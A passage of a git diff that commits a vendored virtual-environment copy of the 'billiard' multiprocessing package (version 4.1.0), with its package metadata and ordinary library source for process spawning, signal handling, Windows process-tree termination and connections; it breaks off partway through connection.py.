distribution. +3. Neither the name of author nor the names of any contributors may be + used to endorse or promote products derived from this software + without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS" AND +ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS +OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT +LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY +OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF +SUCH DAMAGE. + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA b/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA new file mode 100644 index 00000000..abf1404c --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/METADATA @@ -0,0 +1,111 @@ +Metadata-Version: 2.1 +Name: billiard +Version: 4.1.0 +Summary: Python multiprocessing fork with improvements and bugfixes +Home-page: https://github.com/celery/billiard +Author: R Oudkerk / Python Software Foundation +Author-email: python-dev@python.org +Maintainer: Asif Saif Uddin +Maintainer-email: auvipy@gmail.com +License: BSD +Keywords: multiprocessing pool process +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Intended Audience :: Developers +Classifier: Programming Language :: Python +Classifier: Programming Language :: C +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3.11 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Operating System :: Microsoft :: Windows +Classifier: Operating System :: POSIX +Classifier: License :: OSI Approved :: BSD License +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Classifier: Topic :: System :: Distributed Computing +Requires-Python: >=3.7 +License-File: LICENSE.txt + +======== +billiard +======== +:version: 4.1.0 + +|build-status-lin| |build-status-win| |license| |wheel| |pyversion| |pyimp| + +.. |build-status-lin| image:: https://secure.travis-ci.org/celery/billiard.png?branch=master + :alt: Build status on Linux + :target: https://travis-ci.org/celery/billiard + +.. |build-status-win| image:: https://ci.appveyor.com/api/projects/status/github/celery/billiard?png=true&branch=master + :alt: Build status on Windows + :target: https://ci.appveyor.com/project/ask/billiard + +.. |license| image:: https://img.shields.io/pypi/l/billiard.svg + :alt: BSD License + :target: https://opensource.org/licenses/BSD-3-Clause + +.. |wheel| image:: https://img.shields.io/pypi/wheel/billiard.svg + :alt: Billiard can be installed via wheel + :target: https://pypi.org/project/billiard/ + +.. |pyversion| image:: https://img.shields.io/pypi/pyversions/billiard.svg + :alt: Supported Python versions. + :target: https://pypi.org/project/billiard/ + +.. |pyimp| image:: https://img.shields.io/pypi/implementation/billiard.svg + :alt: Support Python implementations. + :target: https://pypi.org/project/billiard/ + +About +----- + +``billiard`` is a fork of the Python 2.7 `multiprocessing `_ +package. The multiprocessing package itself is a renamed and updated version of +R Oudkerk's `pyprocessing `_ package. 
+This standalone variant draws its fixes/improvements from python-trunk and provides +additional bug fixes and improvements. + +- This package would not be possible if not for the contributions of not only + the current maintainers but all of the contributors to the original pyprocessing + package listed `here `_. + +- Also, it is a fork of the multiprocessing backport package by Christian Heims. + +- It includes the no-execv patch contributed by R. Oudkerk. + +- And the Pool improvements previously located in `Celery`_. + +- Billiard is used in and is a dependency for `Celery`_ and is maintained by the + Celery team. + +.. _`Celery`: http://celeryproject.org + +Documentation +------------- + +The documentation for ``billiard`` is available on `Read the Docs `_. + +Bug reporting +------------- + +Please report bugs related to multiprocessing at the +`Python bug tracker `_. Issues related to billiard +should be reported at https://github.com/celery/billiard/issues. + +billiard is part of the Tidelift Subscription +--------------------------------------------- + +The maintainers of ``billiard`` and thousands of other packages are working +with Tidelift to deliver commercial support and maintenance for the open source +dependencies you use to build your applications. Save time, reduce risk, and +improve code health, while paying the maintainers of the exact dependencies you +use. `Learn more`_. + +.. _`Learn more`: https://tidelift.com/subscription/pkg/pypi-billiard?utm_source=pypi-billiard&utm_medium=referral&utm_campaign=readme&utm_term=repo + + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD b/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD new file mode 100644 index 00000000..7047ba65 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/RECORD @@ -0,0 +1,62 @@ +billiard-4.1.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +billiard-4.1.0.dist-info/LICENSE.txt,sha256=ZjLlmsq9u77CYoN9RHJKBlMYlJ8ALv0GAtZCcRrjpFc,1483 +billiard-4.1.0.dist-info/METADATA,sha256=aolwNxOX7RY_L8e-95BUhGMoZRpEIs8hFauy_jbuBos,4389 +billiard-4.1.0.dist-info/RECORD,, +billiard-4.1.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +billiard-4.1.0.dist-info/top_level.txt,sha256=52Kkdlqn9Np8pbpkTVd_1KZTZLGjupUzhUw8QsW-B-U,9 +billiard/__init__.py,sha256=gW4fsfgAwncLwNe2MIB-y1nLWnswFPlJQ8mhvfrrpuI,1556 +billiard/__pycache__/__init__.cpython-310.pyc,, +billiard/__pycache__/_ext.cpython-310.pyc,, +billiard/__pycache__/_win.cpython-310.pyc,, +billiard/__pycache__/common.cpython-310.pyc,, +billiard/__pycache__/compat.cpython-310.pyc,, +billiard/__pycache__/connection.cpython-310.pyc,, +billiard/__pycache__/context.cpython-310.pyc,, +billiard/__pycache__/einfo.cpython-310.pyc,, +billiard/__pycache__/exceptions.cpython-310.pyc,, +billiard/__pycache__/forkserver.cpython-310.pyc,, +billiard/__pycache__/heap.cpython-310.pyc,, +billiard/__pycache__/managers.cpython-310.pyc,, +billiard/__pycache__/pool.cpython-310.pyc,, +billiard/__pycache__/popen_fork.cpython-310.pyc,, +billiard/__pycache__/popen_forkserver.cpython-310.pyc,, +billiard/__pycache__/popen_spawn_posix.cpython-310.pyc,, +billiard/__pycache__/popen_spawn_win32.cpython-310.pyc,, +billiard/__pycache__/process.cpython-310.pyc,, +billiard/__pycache__/queues.cpython-310.pyc,, +billiard/__pycache__/reduction.cpython-310.pyc,, +billiard/__pycache__/resource_sharer.cpython-310.pyc,, +billiard/__pycache__/semaphore_tracker.cpython-310.pyc,, +billiard/__pycache__/sharedctypes.cpython-310.pyc,, 
+billiard/__pycache__/spawn.cpython-310.pyc,, +billiard/__pycache__/synchronize.cpython-310.pyc,, +billiard/__pycache__/util.cpython-310.pyc,, +billiard/_ext.py,sha256=ybsKrDCncAVFL8ml4nMNKbvb2no5sap3qHc6_cwUxqE,872 +billiard/_win.py,sha256=vILzfaBKGhhNjePPfRTdRrVoIygnXyUGtJ4FmBFU4Gw,2919 +billiard/common.py,sha256=zwZfEFio46uJPyyT5sf7Fy8HLLkJdf_WW2CKMo7gpeI,4154 +billiard/compat.py,sha256=Q30pRcJmFdwHDNuJJsB8xmXJfuv_RGT8zuY0PHGB9L0,8148 +billiard/connection.py,sha256=DdrB0iAM0zZtjKmr51hv9t4YjsWHafZ5FCbOKs8mkIw,32647 +billiard/context.py,sha256=QfLpnJwJblvUP_BPRDrbBx9DgKBvH5ZHDDkYr2anw1E,13154 +billiard/dummy/__init__.py,sha256=MGuxw6dYyU-TokOw2mEizwefj-FxjDwq5tEshuSJ5ng,4633 +billiard/dummy/__pycache__/__init__.cpython-310.pyc,, +billiard/dummy/__pycache__/connection.cpython-310.pyc,, +billiard/dummy/connection.py,sha256=UYjJH4smDsj7X0W4uJxvg97z2TxILDL2x5GER4vv4Mw,2907 +billiard/einfo.py,sha256=SJYr7icbwPZe2B0Lq54BQv1AQXJr7ipk6BQCPanavUo,4381 +billiard/exceptions.py,sha256=xymsevvXvB5SO-ebmaHBqQPEJfl6EqThM1PlLtGFk3U,1272 +billiard/forkserver.py,sha256=SPfs8T2uaPtfK_F1ADVNNPZGSUrjeadTf5h6gwKOiPc,8282 +billiard/heap.py,sha256=OV-9fVpdgYC1HJV_gdTOSpKZvPqd1A12s1Rl9CNfLQA,9278 +billiard/managers.py,sha256=yxeuqrtauo173KJy6SuK3EAfRmSWejBqEi-oJ57ZokI,36757 +billiard/pool.py,sha256=P_j1jdXuvWyw4BSjuC5bLVQtQKDG7S40bzLHWZ4ZkWo,68786 +billiard/popen_fork.py,sha256=Kt3n8oEE3J8qb9N28orS7o28Y5bZmBbVe9uU37y-GxQ,2552 +billiard/popen_forkserver.py,sha256=BLLO5B0P9GQj3i2r-16ulKcRMLy3HYNvw8I129ZcNas,1770 +billiard/popen_spawn_posix.py,sha256=cnRYqmztgDv2pURFQl1PzgOzR1ThxuUJeG3ksCy7SCQ,1922 +billiard/popen_spawn_win32.py,sha256=1FH4HYC9ilmkzSEfGqyf6g39qv-zc6cPuM8Z56H51ww,3543 +billiard/process.py,sha256=x1KhWvld6sLNqSEyZPs78CWYtbHPtpyk1t07MXxeLHg,11051 +billiard/queues.py,sha256=b8Ykkvg9B3c5jhXzImcERxCc-bLfDBtFO8u3Y480l08,12739 +billiard/reduction.py,sha256=pVr81gei43nJNhfdSuTDevwmZsiY3LXFTZ-G_uGN5Ts,9382 +billiard/resource_sharer.py,sha256=AKGDzC6ScuX8GdPk9RFEH8MP578_yiJ5Hvy6KTwSIfI,5299 +billiard/semaphore_tracker.py,sha256=72OU2cxJzc3vDamj1oVI5HL8sWRsRfMCWBxQKUP1c2Y,4846 +billiard/sharedctypes.py,sha256=6w59LGEa5PAcufoC4DUUq6TjtyR7cqZz9xmBc9GrLZg,6665 +billiard/spawn.py,sha256=JNdBCCGkQx4wVeTgyiZWMMV-3goL_qJBwtdkkpF5uZ8,11740 +billiard/synchronize.py,sha256=hmQisAgIePaxIpYR2_4D7Nfa9-EurXpeViT5nyKue0I,12962 +billiard/util.py,sha256=oMkyLqonT1IvdmpM_RBUnLDUeK5h5_DeCH9IY7FoGu0,6088 diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL b/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt b/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt new file mode 100644 index 00000000..7ac9b310 --- /dev/null +++ b/env/Lib/site-packages/billiard-4.1.0.dist-info/top_level.txt @@ -0,0 +1 @@ +billiard diff --git a/env/Lib/site-packages/billiard/__init__.py b/env/Lib/site-packages/billiard/__init__.py new file mode 100644 index 00000000..af216c99 --- /dev/null +++ b/env/Lib/site-packages/billiard/__init__.py @@ -0,0 +1,60 @@ +"""Python multiprocessing fork with improvements and bugfixes""" +# +# Package analogous to 'threading.py' but using processes +# +# multiprocessing/__init__.py +# +# This package is intended to duplicate the functionality (and much of +# the API) of threading.py but uses 
processes instead of threads. A +# subpackage 'multiprocessing.dummy' has the same API but is a simple +# wrapper for 'threading'. +# +# Try calling `multiprocessing.doc.main()` to read the html +# documentation in a webbrowser. +# +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + + +import sys +from . import context + +VERSION = (4, 1, 0) +__version__ = '.'.join(map(str, VERSION[0:4])) + "".join(VERSION[4:]) +__author__ = 'R Oudkerk / Python Software Foundation' +__author_email__ = 'python-dev@python.org' +__maintainer__ = 'Asif Saif Uddin' +__contact__ = "auvipy@gmail.com" +__homepage__ = "https://github.com/celery/billiard" +__docformat__ = "restructuredtext" + +# -eof meta- + +# +# Copy stuff from default context +# + +globals().update((name, getattr(context._default_context, name)) + for name in context._default_context.__all__) +__all__ = context._default_context.__all__ + +# +# XXX These should not really be documented or public. +# + +SUBDEBUG = 5 +SUBWARNING = 25 + +# +# Alias for main module -- will be reset by bootstrapping child processes +# + +if '__main__' in sys.modules: + sys.modules['__mp_main__'] = sys.modules['__main__'] + + +def ensure_multiprocessing(): + from ._ext import ensure_multiprocessing + return ensure_multiprocessing() diff --git a/env/Lib/site-packages/billiard/_ext.py b/env/Lib/site-packages/billiard/_ext.py new file mode 100644 index 00000000..00a53cda --- /dev/null +++ b/env/Lib/site-packages/billiard/_ext.py @@ -0,0 +1,32 @@ +import sys + +supports_exec = True + +from .compat import _winapi as win32 # noqa + +if sys.platform.startswith("java"): + _billiard = None +else: + try: + import _billiard # noqa + except ImportError: + import _multiprocessing as _billiard # noqa + supports_exec = False + + +def ensure_multiprocessing(): + if _billiard is None: + raise NotImplementedError("multiprocessing not supported") + + +def ensure_SemLock(): + try: + from _billiard import SemLock # noqa + except ImportError: + try: + from _multiprocessing import SemLock # noqa + except ImportError: + raise ImportError("""\ +This platform lacks a functioning sem_open implementation, therefore, +the required synchronization primitives needed will not function, +see issue 3770.""") diff --git a/env/Lib/site-packages/billiard/_win.py b/env/Lib/site-packages/billiard/_win.py new file mode 100644 index 00000000..1dcba646 --- /dev/null +++ b/env/Lib/site-packages/billiard/_win.py @@ -0,0 +1,114 @@ +""" + billiard._win + ~~~~~~~~~~~~~ + + Windows utilities to terminate process groups. + +""" + +import os + +# psutil is painfully slow in win32. 
So to avoid adding big +# dependencies like pywin32 a ctypes based solution is preferred + +# Code based on the winappdbg project http://winappdbg.sourceforge.net/ +# (BSD License) +from ctypes import ( + byref, sizeof, windll, + Structure, WinError, POINTER, + c_size_t, c_char, c_void_p, +) +from ctypes.wintypes import DWORD, LONG + +ERROR_NO_MORE_FILES = 18 +INVALID_HANDLE_VALUE = c_void_p(-1).value + + +class PROCESSENTRY32(Structure): + _fields_ = [ + ('dwSize', DWORD), + ('cntUsage', DWORD), + ('th32ProcessID', DWORD), + ('th32DefaultHeapID', c_size_t), + ('th32ModuleID', DWORD), + ('cntThreads', DWORD), + ('th32ParentProcessID', DWORD), + ('pcPriClassBase', LONG), + ('dwFlags', DWORD), + ('szExeFile', c_char * 260), + ] +LPPROCESSENTRY32 = POINTER(PROCESSENTRY32) + + +def CreateToolhelp32Snapshot(dwFlags=2, th32ProcessID=0): + hSnapshot = windll.kernel32.CreateToolhelp32Snapshot(dwFlags, + th32ProcessID) + if hSnapshot == INVALID_HANDLE_VALUE: + raise WinError() + return hSnapshot + + +def Process32First(hSnapshot, pe=None): + return _Process32n(windll.kernel32.Process32First, hSnapshot, pe) + + +def Process32Next(hSnapshot, pe=None): + return _Process32n(windll.kernel32.Process32Next, hSnapshot, pe) + + +def _Process32n(fun, hSnapshot, pe=None): + if pe is None: + pe = PROCESSENTRY32() + pe.dwSize = sizeof(PROCESSENTRY32) + success = fun(hSnapshot, byref(pe)) + if not success: + if windll.kernel32.GetLastError() == ERROR_NO_MORE_FILES: + return + raise WinError() + return pe + + +def get_all_processes_pids(): + """Return a dictionary with all processes pids as keys and their + parents as value. Ignore processes with no parents. + """ + h = CreateToolhelp32Snapshot() + parents = {} + pe = Process32First(h) + while pe: + if pe.th32ParentProcessID: + parents[pe.th32ProcessID] = pe.th32ParentProcessID + pe = Process32Next(h, pe) + + return parents + + +def get_processtree_pids(pid, include_parent=True): + """Return a list with all the pids of a process tree""" + parents = get_all_processes_pids() + all_pids = list(parents.keys()) + pids = {pid} + while 1: + pids_new = pids.copy() + + for _pid in all_pids: + if parents[_pid] in pids: + pids_new.add(_pid) + + if pids_new == pids: + break + + pids = pids_new.copy() + + if not include_parent: + pids.remove(pid) + + return list(pids) + + +def kill_processtree(pid, signum): + """Kill a process and all its descendants""" + family_pids = get_processtree_pids(pid) + + for _pid in family_pids: + os.kill(_pid, signum) diff --git a/env/Lib/site-packages/billiard/common.py b/env/Lib/site-packages/billiard/common.py new file mode 100644 index 00000000..9324d3bc --- /dev/null +++ b/env/Lib/site-packages/billiard/common.py @@ -0,0 +1,157 @@ +""" +This module contains utilities added by billiard, to keep +"non-core" functionality out of ``.util``.""" + +import os +import signal +import sys + +import pickle + +from .exceptions import RestartFreqExceeded +from time import monotonic + +pickle_load = pickle.load +pickle_loads = pickle.loads + +# cPickle.loads does not support buffer() objects, +# but we can just create a StringIO and use load. 
+from io import BytesIO + + +SIGMAP = dict( + (getattr(signal, n), n) for n in dir(signal) if n.startswith('SIG') +) +for _alias_sig in ('SIGHUP', 'SIGABRT'): + try: + # Alias for deprecated signal overwrites the name we want + SIGMAP[getattr(signal, _alias_sig)] = _alias_sig + except AttributeError: + pass + + +TERM_SIGNAL, TERM_SIGNAME = signal.SIGTERM, 'SIGTERM' +REMAP_SIGTERM = os.environ.get('REMAP_SIGTERM') +if REMAP_SIGTERM: + TERM_SIGNAL, TERM_SIGNAME = ( + getattr(signal, REMAP_SIGTERM), REMAP_SIGTERM) + + +TERMSIGS_IGNORE = {'SIGTERM'} if REMAP_SIGTERM else set() +TERMSIGS_FORCE = {'SIGQUIT'} if REMAP_SIGTERM else set() + +EX_SOFTWARE = 70 + +TERMSIGS_DEFAULT = { + 'SIGHUP', + 'SIGQUIT', + TERM_SIGNAME, + 'SIGUSR1', + 'SIGUSR2' +} + +TERMSIGS_FULL = { + 'SIGHUP', + 'SIGQUIT', + 'SIGTRAP', + 'SIGABRT', + 'SIGEMT', + 'SIGSYS', + 'SIGPIPE', + 'SIGALRM', + TERM_SIGNAME, + 'SIGXCPU', + 'SIGXFSZ', + 'SIGVTALRM', + 'SIGPROF', + 'SIGUSR1', + 'SIGUSR2', +} + +#: set by signal handlers just before calling exit. +#: if this is true after the sighandler returns it means that something +#: went wrong while terminating the process, and :func:`os._exit` +#: must be called ASAP. +_should_have_exited = [False] + + +def human_status(status): + if (status or 0) < 0: + try: + return 'signal {0} ({1})'.format(-status, SIGMAP[-status]) + except KeyError: + return 'signal {0}'.format(-status) + return 'exitcode {0}'.format(status) + + +def pickle_loads(s, load=pickle_load): + # used to support buffer objects + return load(BytesIO(s)) + + +def maybe_setsignal(signum, handler): + try: + signal.signal(signum, handler) + except (OSError, AttributeError, ValueError, RuntimeError): + pass + + +def _shutdown_cleanup(signum, frame): + # we will exit here so if the signal is received a second time + # we can be sure that something is very wrong and we may be in + # a crashing loop. + if _should_have_exited[0]: + os._exit(EX_SOFTWARE) + maybe_setsignal(signum, signal.SIG_DFL) + _should_have_exited[0] = True + sys.exit(-(256 - signum)) + + +def signum(sig): + return getattr(signal, sig, None) + + +def _should_override_term_signal(sig, current): + return ( + sig in TERMSIGS_FORCE or + (current is not None and current != signal.SIG_IGN) + ) + + +def reset_signals(handler=_shutdown_cleanup, full=False): + for sig in TERMSIGS_FULL if full else TERMSIGS_DEFAULT: + num = signum(sig) + if num: + if _should_override_term_signal(sig, signal.getsignal(num)): + maybe_setsignal(num, handler) + for sig in TERMSIGS_IGNORE: + num = signum(sig) + if num: + maybe_setsignal(num, signal.SIG_IGN) + + +class restart_state: + RestartFreqExceeded = RestartFreqExceeded + + def __init__(self, maxR, maxT): + self.maxR, self.maxT = maxR, maxT + self.R, self.T = 0, None + + def step(self, now=None): + now = monotonic() if now is None else now + R = self.R + if self.T and now - self.T >= self.maxT: + # maxT passed, reset counter and time passed. + self.T, self.R = now, 0 + elif self.maxR and self.R >= self.maxR: + # verify that R has a value as the result handler + # resets this when a job is accepted. 
If a job is accepted + # the startup probably went fine (startup restart burst + # protection) + if self.R: # pragma: no cover + self.R = 0 # reset in case someone catches the error + raise self.RestartFreqExceeded("%r in %rs" % (R, self.maxT)) + # first run sets T + if self.T is None: + self.T = now + self.R += 1 diff --git a/env/Lib/site-packages/billiard/compat.py b/env/Lib/site-packages/billiard/compat.py new file mode 100644 index 00000000..bea97467 --- /dev/null +++ b/env/Lib/site-packages/billiard/compat.py @@ -0,0 +1,279 @@ +import errno +import numbers +import os +import subprocess +import sys + +from itertools import zip_longest + +if sys.platform == 'win32': + try: + import _winapi # noqa + except ImportError: # pragma: no cover + from _multiprocessing import win32 as _winapi # noqa +else: + _winapi = None # noqa + +try: + import resource +except ImportError: # pragma: no cover + resource = None + +from io import UnsupportedOperation +FILENO_ERRORS = (AttributeError, ValueError, UnsupportedOperation) + + +if hasattr(os, 'write'): + __write__ = os.write + + def send_offset(fd, buf, offset): + return __write__(fd, buf[offset:]) + +else: # non-posix platform + + def send_offset(fd, buf, offset): # noqa + raise NotImplementedError('send_offset') + + +try: + fsencode = os.fsencode + fsdecode = os.fsdecode +except AttributeError: + def _fscodec(): + encoding = sys.getfilesystemencoding() + if encoding == 'mbcs': + errors = 'strict' + else: + errors = 'surrogateescape' + + def fsencode(filename): + """ + Encode filename to the filesystem encoding with 'surrogateescape' + error handler, return bytes unchanged. On Windows, use 'strict' + error handler if the file system encoding is 'mbcs' (which is the + default encoding). + """ + if isinstance(filename, bytes): + return filename + elif isinstance(filename, str): + return filename.encode(encoding, errors) + else: + raise TypeError("expect bytes or str, not %s" + % type(filename).__name__) + + def fsdecode(filename): + """ + Decode filename from the filesystem encoding with 'surrogateescape' + error handler, return str unchanged. On Windows, use 'strict' error + handler if the file system encoding is 'mbcs' (which is the default + encoding). + """ + if isinstance(filename, str): + return filename + elif isinstance(filename, bytes): + return filename.decode(encoding, errors) + else: + raise TypeError("expect bytes or str, not %s" + % type(filename).__name__) + + return fsencode, fsdecode + + fsencode, fsdecode = _fscodec() + del _fscodec + + +def maybe_fileno(f): + """Get object fileno, or :const:`None` if not defined.""" + if isinstance(f, numbers.Integral): + return f + try: + return f.fileno() + except FILENO_ERRORS: + pass + + +def get_fdmax(default=None): + """Return the maximum number of open file descriptors + on this system. + + :keyword default: Value returned if there's no file + descriptor limit. 
+ + """ + try: + return os.sysconf('SC_OPEN_MAX') + except: + pass + if resource is None: # Windows + return default + fdmax = resource.getrlimit(resource.RLIMIT_NOFILE)[1] + if fdmax == resource.RLIM_INFINITY: + return default + return fdmax + + +def uniq(it): + """Return all unique elements in ``it``, preserving order.""" + seen = set() + return (seen.add(obj) or obj for obj in it if obj not in seen) + + +try: + closerange = os.closerange +except AttributeError: + + def closerange(fd_low, fd_high): # noqa + for fd in reversed(range(fd_low, fd_high)): + try: + os.close(fd) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + def close_open_fds(keep=None): + # must make sure this is 0-inclusive (Issue #celery/1882) + keep = list(uniq(sorted( + f for f in map(maybe_fileno, keep or []) if f is not None + ))) + maxfd = get_fdmax(default=2048) + kL, kH = iter([-1] + keep), iter(keep + [maxfd]) + for low, high in zip_longest(kL, kH): + if low + 1 != high: + closerange(low + 1, high) +else: + def close_open_fds(keep=None): # noqa + keep = [maybe_fileno(f) + for f in (keep or []) if maybe_fileno(f) is not None] + for fd in reversed(range(get_fdmax(default=2048))): + if fd not in keep: + try: + os.close(fd) + except OSError as exc: + if exc.errno != errno.EBADF: + raise + + +def get_errno(exc): + """:exc:`socket.error` and :exc:`IOError` first got + the ``.errno`` attribute in Py2.7""" + try: + return exc.errno + except AttributeError: + return 0 + + +try: + import _posixsubprocess +except ImportError: + def spawnv_passfds(path, args, passfds): + if sys.platform != 'win32': + # when not using _posixsubprocess (on earlier python) and not on + # windows, we want to keep stdout/stderr open... + passfds = passfds + [ + maybe_fileno(sys.stdout), + maybe_fileno(sys.stderr), + ] + pid = os.fork() + if not pid: + close_open_fds(keep=sorted(f for f in passfds if f)) + os.execv(fsencode(path), args) + return pid +else: + def spawnv_passfds(path, args, passfds): + passfds = sorted(passfds) + errpipe_read, errpipe_write = os.pipe() + try: + args = [ + args, [fsencode(path)], True, tuple(passfds), None, None, + -1, -1, -1, -1, -1, -1, errpipe_read, errpipe_write, + False, False] + if sys.version_info >= (3, 11): + args.append(-1) # process_group + if sys.version_info >= (3, 9): + args.extend((None, None, None, -1)) # group, extra_groups, user, umask + args.append(None) # preexec_fn + if sys.version_info >= (3, 11): + args.append(subprocess._USE_VFORK) + return _posixsubprocess.fork_exec(*args) + finally: + os.close(errpipe_read) + os.close(errpipe_write) + + +if sys.platform == 'win32': + + def setblocking(handle, blocking): + raise NotImplementedError('setblocking not implemented on win32') + + def isblocking(handle): + raise NotImplementedError('isblocking not implemented on win32') + +else: + from os import O_NONBLOCK + from fcntl import fcntl, F_GETFL, F_SETFL + + def isblocking(handle): # noqa + return not (fcntl(handle, F_GETFL) & O_NONBLOCK) + + def setblocking(handle, blocking): # noqa + flags = fcntl(handle, F_GETFL, 0) + fcntl( + handle, F_SETFL, + flags & (~O_NONBLOCK) if blocking else flags | O_NONBLOCK, + ) + + +E_PSUTIL_MISSING = """ +On Windows, the ability to inspect memory usage requires the psutil library. + +You can install it using pip: + + $ pip install psutil +""" + + +E_RESOURCE_MISSING = """ +Your platform ({0}) does not seem to have the `resource.getrusage' function. + +Please open an issue so that we can add support for this platform. 
+""" + + +if sys.platform == 'win32': + + try: + import psutil + except ImportError: # pragma: no cover + psutil = None # noqa + + def mem_rss(): + # type () -> int + if psutil is None: + raise ImportError(E_PSUTIL_MISSING.strip()) + return int(psutil.Process(os.getpid()).memory_info()[0] / 1024.0) + +else: + try: + from resource import getrusage, RUSAGE_SELF + except ImportError: # pragma: no cover + getrusage = RUSAGE_SELF = None # noqa + + if 'bsd' in sys.platform or sys.platform == 'darwin': + # On BSD platforms :man:`getrusage(2)` ru_maxrss field is in bytes. + + def maxrss_to_kb(v): + # type: (SupportsInt) -> int + return int(v) / 1024.0 + + else: + # On Linux it's kilobytes. + + def maxrss_to_kb(v): + # type: (SupportsInt) -> int + return int(v) + + def mem_rss(): + # type () -> int + if resource is None: + raise ImportError(E_RESOURCE_MISSING.strip().format(sys.platform)) + return maxrss_to_kb(getrusage(RUSAGE_SELF).ru_maxrss) diff --git a/env/Lib/site-packages/billiard/connection.py b/env/Lib/site-packages/billiard/connection.py new file mode 100644 index 00000000..70b80590 --- /dev/null +++ b/env/Lib/site-packages/billiard/connection.py @@ -0,0 +1,1034 @@ +# +# A higher level module for using sockets (or Windows named pipes) +# +# multiprocessing/connection.py +# +# Copyright (c) 2006-2008, R Oudkerk +# Licensed to PSF under a Contributor Agreement. +# + +import errno +import io +import os +import sys +import socket +import select +import struct +import tempfile +import itertools + +from . import reduction +from . import util + +from . import AuthenticationError, BufferTooShort +from ._ext import _billiard +from .compat import setblocking, send_offset +from time import monotonic +from .reduction import ForkingPickler + +try: + from .compat import _winapi +except ImportError: + if sys.platform == 'win32': + raise + _winapi = None +else: + if sys.platform == 'win32': + WAIT_OBJECT_0 = _winapi.WAIT_OBJECT_0 + WAIT_ABANDONED_0 = _winapi.WAIT_ABANDONED_0 + + WAIT_TIMEOUT = _winapi.WAIT_TIMEOUT + INFINITE = _winapi.INFINITE + +__all__ = ['Client', 'Listener', 'Pipe', 'wait'] + +is_pypy = hasattr(sys, 'pypy_version_info') + +# +# +# + +BUFSIZE = 8192 +# A very generous timeout when it comes to local connections... +CONNECTION_TIMEOUT = 20. + +_mmap_counter = itertools.count() + +default_family = 'AF_INET' +families = ['AF_INET'] + +if hasattr(socket, 'AF_UNIX'): + default_family = 'AF_UNIX' + families += ['AF_UNIX'] + +if sys.platform == 'win32': + default_family = 'AF_PIPE' + families += ['AF_PIPE'] + + +def _init_timeout(timeout=CONNECTION_TIMEOUT): + return monotonic() + timeout + + +def _check_timeout(t): + return monotonic() > t + +# +# +# + + +def arbitrary_address(family): + ''' + Return an arbitrary free address for the given family + ''' + if family == 'AF_INET': + return ('localhost', 0) + elif family == 'AF_UNIX': + return tempfile.mktemp(prefix='listener-', dir=util.get_temp_dir()) + elif family == 'AF_PIPE': + return tempfile.mktemp(prefix=r'\\.\pipe\pyc-%d-%d-' % + (os.getpid(), next(_mmap_counter)), dir="") + else: + raise ValueError('unrecognized family') + + +def _validate_family(family): + ''' + Checks if the family is valid for the current environment. + ''' + if sys.platform != 'win32' and family == 'AF_PIPE': + raise ValueError('Family %s is not recognized.' % family) + + if sys.platform == 'win32' and family == 'AF_UNIX': + # double check + if not hasattr(socket, family): + raise ValueError('Family %s is not recognized.' 
% family) + + +def address_type(address): + ''' + Return the types of the address + + This can be 'AF_INET', 'AF_UNIX', or 'AF_PIPE' + ''' + if type(address) == tuple: + return 'AF_INET' + elif type(address) is str and address.startswith('\\\\'): + return 'AF_PIPE' + elif type(address) is str: + return 'AF_UNIX' + else: + raise ValueError('address type of %r unrecognized' % address) + +# +# Connection classes +# + + +class _SocketContainer: + + def __init__(self, sock): + self.sock = sock + + +class _ConnectionBase: + _handle = None + + def __init__(self, handle, readable=True, writable=True): + if isinstance(handle, _SocketContainer): + self._socket = handle.sock # keep ref so not collected + handle = handle.sock.fileno() + handle = handle.__index__() + if handle < 0: + raise ValueError("invalid handle") + if not readable and not writable: + raise ValueError( + "at least one of `readable` and `writable` must be True") + self._handle = handle + self._readable = readable + self._writable = writable + + # XXX should we use util.Finalize instead of a __del__? + + def __del__(self): + if self._handle is not None: + self._close() + + def _check_closed(self): + if self._handle is None: + raise OSError("handle is closed") + + def _check_readable(self): + if not self._readable: + raise OSError("connection is 